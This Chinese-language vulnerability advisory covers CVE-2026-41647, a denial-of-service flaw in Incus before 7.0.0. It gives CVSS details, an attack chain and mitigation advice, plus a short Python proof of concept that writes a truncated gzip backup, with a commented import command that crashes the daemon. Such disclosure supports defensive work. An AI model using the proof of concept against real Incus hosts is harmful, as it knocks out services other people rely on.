CVE-2026-41647 CVSS 6.5 中危

CVE-2026-41647 Incus拒绝服务漏洞

披露日期: 2026-05-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41647

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Incus

漏洞概述

Incus是一款系统容器和虚拟机管理器。在7.0.0版本之前，由于缺少错误处理机制，经过身份验证的攻击者可以通过导入一个被截断的存储桶备份文件，触发守护进程的崩溃，从而导致拒绝服务。该漏洞影响了系统的可用性，建议尽快升级修复。

技术细节

该漏洞位于Incus的存储桶备份导入功能中。在受影响的版本（<7.0.0）中，软件未能充分验证导入文件的完整性或正确处理文件读取过程中的异常情况。当低权限用户上传特制的截断备份文件时，Incus守护进程在解析文件结构时未能捕获预期的错误，导致未处理的异常抛出进而引发程序崩溃。由于该漏洞通过网络攻击向量（AV:N）利用，且不需要用户交互（UI:N），攻击者一旦拥有合法的低权限账户，即可远程触发该崩溃。攻击过程利用了守护进程在处理边界条件时的逻辑缺陷，未对文件结束状态或特定损坏标记进行有效防御，导致管理服务不可用，从而造成拒绝服务攻击。

攻击链分析

STEP 1

获取权限

攻击者获取目标Incus系统的低权限用户账户。

STEP 2

构造恶意文件

攻击者创建一个被截断或格式错误的存储桶备份文件。

STEP 3

发起攻击

攻击者利用API或CLI命令导入该恶意文件。

STEP 4

触发崩溃

Incus守护进程在处理文件时因缺少错误处理而崩溃。

STEP 5

造成影响

服务不可用，实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-41647
# This script demonstrates how a truncated storage bucket backup
# might trigger the crash in vulnerable Incus versions (< 7.0.0).

import os

# Create a dummy truncated file acting as a backup
malicious_file = "truncated_bucket_backup.tar.gz"

with open(malicious_file, 'wb') as f:
    # Write a partial header to simulate a truncated/corrupt backup
    f.write(b'\x1f\x8b\x08\x00') # Gzip magic number
    # The file is intentionally incomplete/truncated

print(f"[+] Created truncated backup file: {malicious_file}")

# The attacker would then use the Incus API or CLI to import this file.
# Example command (conceptual):
# incus storage bucket import <pool> <bucket> <malicious_file>

print("[+] To exploit: Use the Incus CLI/API to import this truncated backup.")
print("[+] Expected Result: Incus daemon crashes due to unhandled error.")

影响范围

Incus < 7.0.0

防御指南

临时缓解措施

在升级前，应严格限制用户对存储桶备份导入功能的访问权限，并监控守护进程的异常崩溃情况。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表